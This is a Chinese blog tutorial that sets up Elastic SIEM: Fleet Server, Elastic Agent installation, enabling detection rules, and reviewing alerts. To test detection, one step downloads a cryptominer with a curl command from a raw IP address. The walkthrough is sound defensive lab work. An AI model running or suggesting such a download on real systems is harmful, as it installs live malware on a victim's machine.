<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-cc6b99b05be812cb520622fc334fe263-image-20220207153304004-554c11.png" alt="image-20220207153304004"></p>
<p>点击右下角的save and continue。</p>
<p>弹窗出来Endpoint Security integration added页面，点击右边的按钮。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-2e960a1f73c2dd0c4a3fd05742d6aee2-image-20220207153430305-9ebc7c.png" alt="image-20220207153430305"></p>
<p>点击agent的名字，选择上面的Add integration。搜索fleet server。点击添加。save保存即可。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-d0e9eb60cc4e0da8a1c36299efbb2835-image-20220207153631185-f224b5.png" alt="image-20220207153631185"></p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-bcdb5c27b0390d66c68b0c5e598a8d17-image-20220207153646839-4ad072.png" alt="image-20220207153646839"></p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-86ee6db982946070272728b2d3dd08a9-image-20220207153708078-d315df.png" alt="image-20220207153708078"></p>
<p>保存后再点击按钮，又到了这个页面，可以看到多了一个集成工具</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-6cfa0619a8411597053e1ecdff4cfd74-image-20220207153838907-d56930.png" alt="image-20220207153838907"></p>
<p>右上角fleet setting配置fleet和es地址</p>
<pre class="line-numbers language-none"><code class="language-none">http:&#x2F;&#x2F;192.168.36.135:8220
http:&#x2F;&#x2F;192.168.36.135:9200<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>点击保存应用。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-6d70afae5d7589687bddf6968936df31-image-20220207153950309-eca7d0.png" alt="image-20220207153950309"></p>
<p>下载agent：<a target="_blank" rel="noopener" href="https://artifacts.elastic.co/downloads/beats/elastic-agent/elastic-agent-7.16.3-linux-x86_64.tar.gz">https://artifacts.elastic.co/downloads/beats/elastic-agent/elastic-agent-7.16.3-linux-x86_64.tar.gz</a></p>
<p>选择对应的agent规则</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-84a7ea8e3842a0d310cfc82d6b6e2f8f-image-20220207154329008-aeda3b.png" alt="image-20220207154329008"></p>
<p>按照页面上的命令安装，上面选择的是快速安装，系统安装成功后会显示successfully installed。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-35aaabe688ff86b2ea641a26790bf837-image-20220207155032007-df843d.png" alt="image-20220207155032007"></p>
<p>页面上也会显示Fleet Server connected。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-a0a9a96d75a5b88e14c494982126e3bc-image-20220207155043773-e46b4c.png" alt="image-20220207155043773"></p>
<p>再fleet的页面下也可以看到添加成功的agent主机信息</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-79aa5356386be1d85521e12f8228488b-image-20220207155135103-3e374d.png" alt="image-20220207155135103"></p>
<p>再security下选择Rules去启用规则，点击Select all 623 rules，再bulk actions中选择第一个启用。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-6c458602adbaac60895a2145415b66e9-image-20220207155215387-9a7f17.png" alt="image-20220207155215387"></p>
<p>其中有一些是需要机器学习来启用的，这个是付费功能，我们暂时不管，如果有报错，那可能是一次启用太多，多试几次，或者分开启用。</p>
<p>如果需要添加代理，则在同页面下的endpoint下去选择集成添加即可。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-9ac10da98bc3d2a27694b405ad923fac-image-20220207155417350-6156c5.png" alt="image-20220207155417350"></p>
<p>在alerts页面下可以看到告警，这个我们安装一个挖矿程序。</p>
<pre class="line-numbers language-none"><code class="language-none">curl -O 2.58.149.237:6972&#x2F;hoze<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在alerts页面下就可以看到几条告警</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-0c0ae4d3560b808a55384c5ce15a0e0e-image-20220207164305602-414bff.png" alt="image-20220207164305602"></p>
<p>点击分析事件，看到调用关系。点击其中执行的命令可以看到具体的调用参数。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-7e37f60946d191e6203f841b80273318-image-20220207164603069-acddac.png" alt="image-20220207164603069"></p>
<p>如果一直没看到数据，需要查看添加agent的时候是不是选对规则了，这里设置的一个test policy。在Fleet中查看agent的规则，如果发现不是我们自己设定的规则，那需要修改一下规则。</p>
<p>在agent policies中可以看到规则中存在的主机系统。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-41e2487fa7de06a6857e38e0f33f668e-image-20220207164713461-2b9f91.png" alt="image-20220207164713461"></p>
<p>以上的告警，也可以在Analytics中查看，Discover，比如筛选其中的进程md5hash。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-a56d06ad69caf0282c3aed9b9e2969b0-image-20220207165231075-785def.png" alt="image-20220207165231075"></p>

          </div>
          <br><br>
              
                <div class="license-wrapper">
                    <p>原文作者：<a href="https://misakikata.github.io">Misaki</a>
                    <p>原文链接：<a href="https://misakikata.github.io/2023/01/Elastic-SIEM/">https://misakikata.github.io/2023/01/Elastic-SIEM/</a>
                    <p>发表日期：<a href="https://misakikata.github.io/2023/01/Elastic-SIEM/">January 13th 2023, 10:34:21 am</a>
                    <p>更新日期：<a href="https://misakikata.github.io/2023/01/Elastic-SIEM/">January 13th 2023, 10:34:21 am</a>
                    <p>版权声明：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
                </div>
              
          <br><br>
          <div>
              <p>
                       
                      <span class="badge badge-default">#&nbsp;Open Source Security</span>
                      &nbsp;
                      
              </p>
          </div>
        </div>
      </div>  
    </div>
  </div>
  <!-- TOC -->
  
      <div class="">
        <div id="toc">
          <p class="toc-title"><i class="material-icons" style="vertical-align:middle">toc</i>Toc:</p> 
          <div id="tocbot"></div>
        </div>
      </div>
  
</div>


<!-- Comments -->
<div class="row">
    <div class="col-md-8 offset-md-2">
    
        
            <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>               
        var disqus_shortname = '';
        var disqus_config = function () {
            this.page.url = 'https://misakikata.github.io/2023/01/Elastic-SIEM/'; 
            this.page.identifier = '/2023/01/Elastic-SIEM/';
        };
        (function() { 
            var d = document, s = d.createElement('script');
            s.type = 'text/javascript';
            s.src = '//'+disqus_shortname+'.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();
    </script>
    <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>                                
</div>
        
    
    </div>
</div>
  

<footer class="footer footer-default">
        <div class="container">
          <div class="float-left" style="padding: 15px 0;">
              <b>假如今天的你被生活辜负了，别伤心，因为明天生活还会继续辜负你！</b>
          </div>
          <div align="right" style="padding: 15px 0;">
              <i class="iconfont icon-love" ></i>
              <a href="https://github.com/0x2e/Material-T" target="_blank"> <b>Material-T</b></a>
          </div>
        </div>
</footer>
      <!--   Core JS Files   -->
      
<script src="/js/core/jquery.min.js?v=3.2.1.js"></script>

      
<script src="/js/main.js"></script>

      
<script src="/js/core/popper.min.js"></script>

      
<script src="/js/core/bootstrap-material-design.min.js"></script>

      
<script src="/js/plugins/moment.min.js"></script>

      
<script src="/js/material-kit.min.js?v=2.0.5.js"></script>

      
        <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
        
<script src="/js/post.js"></script>

        
<script src="/js/plugins/prettify.js"></script>

        <script>
            $(document).ready(function(){
                $('pre').addClass('prettyprint linenums');
                prettyPrint();
            })
        </script>
      
<script src="/live2d-widget/autoload.js"></script>
</body>
</html>